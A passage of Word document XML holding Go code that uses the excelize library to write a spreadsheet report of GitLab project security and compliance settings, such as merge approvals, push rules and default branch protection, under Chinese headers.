        <w:t>} else if v == "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>推送规则：未</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GPG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>签名的提交</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" || v == "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>推送规则：拒绝未验证邮箱的用户的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>push" || v == "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>推送规则：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>commit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作者和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>push</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>者需要是经过邮箱验证的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitlab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFFD277" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3A1312" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>} else if v == "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合规性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" || v == "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不合规描述</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FA6C7D" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D20ADCF" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B8B317" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>project_title_merge_start := toChar(i) + strconv.Itoa(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBB71D7" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>project_title_merge_end := toChar(i) + strconv.Itoa(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0B21F1" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>err = f.MergeCell(sheetName_Project, project_title_merge_start, project_title_merge_end)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5521F669" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F70E83" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println(fmt.Sprintf("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合并单元格失败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:%s", err))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF46E70" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3D9706" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD7C74E" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4005B435" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DF29EC" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合并</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的推送规则和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>push rule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和默认分支保护</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D582650" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.MergeCell(sheetName_Project, MR_flag_start, MR_flag_end)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C2B443" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8A4914" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println(fmt.Sprintf("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合并单元格失败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:%s", err))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D225CD5" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5025AE" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC256EF" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>f.SetCellValue(sheetName_Project, MR_flag_start, "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合并批准</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8DD6AE" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.MergeCell(sheetName_Project, PR_flag_start, PR_flag_end)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5571B278" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D87698" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println(fmt.Sprintf("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合并单元格失败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:%s", err))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4A6641" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D41BEEE" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4678D7" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>f.SetCellValue(sheetName_Project, PR_flag_start, "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>推送规则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0096BBC8" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.MergeCell(sheetName_Project, DBP_flag_start, DBP_flag_end)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AE9BCF" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129C17DD" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println(fmt.Sprintf("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合并单元格失败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:%s", err))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094C3917" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C36E13D" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706BB3FE" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>f.SetCellValue(sheetName_Project, DBP_flag_start, "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认分支保护</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE4FCB9" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61C0434F" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>var single_project []interface{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E32284" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>for _, v := range o.Projects.Projects {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAFDC3F" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28A142DE" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>row++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8EFA4A" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>name, err = excelize.JoinCellName("A", row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0124D934" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAD5E14" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFF1C53" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEE99A9" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B89A576" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>single_project = []interface{}{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9D7B21" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>strconv.Itoa(v.Id),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668983F7" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>v.NameSpace,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449898E9" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>v.ProjectName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2EF7FD" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>v.VisibilityNoPublic,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEC7A7A" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>v.TagMediaLinkAuth,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742384CA" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>v.SecurityAndCompliance,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AA3DEF" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>v.MergeRequestsAuthorApproval,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B16B9BD" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>v.MergeRequestsDisableCommittersApproval,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E05F2D" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>v.DisableOverridingApproversPerMergeRequest,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B0212E" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>v.RequirePasswordToApprove,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF5C7C4" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>v.ResetApprovalsOnPush,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FD6CD0" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>v.MegerRequestApprovalsRulesRequireNumber,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524453C2" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>v.DefaultBranchProtected,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224E1E68" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>v.DefaultBranchProtectedDescription,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F148F6" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>v.AccessTokenExpire,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2888BC4B" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>v.MergePipelinesEnabled,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AC4232" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>v.MergeTrainsEnabled,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B742D71" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>v.RejectUnsignCommit,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03000126" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
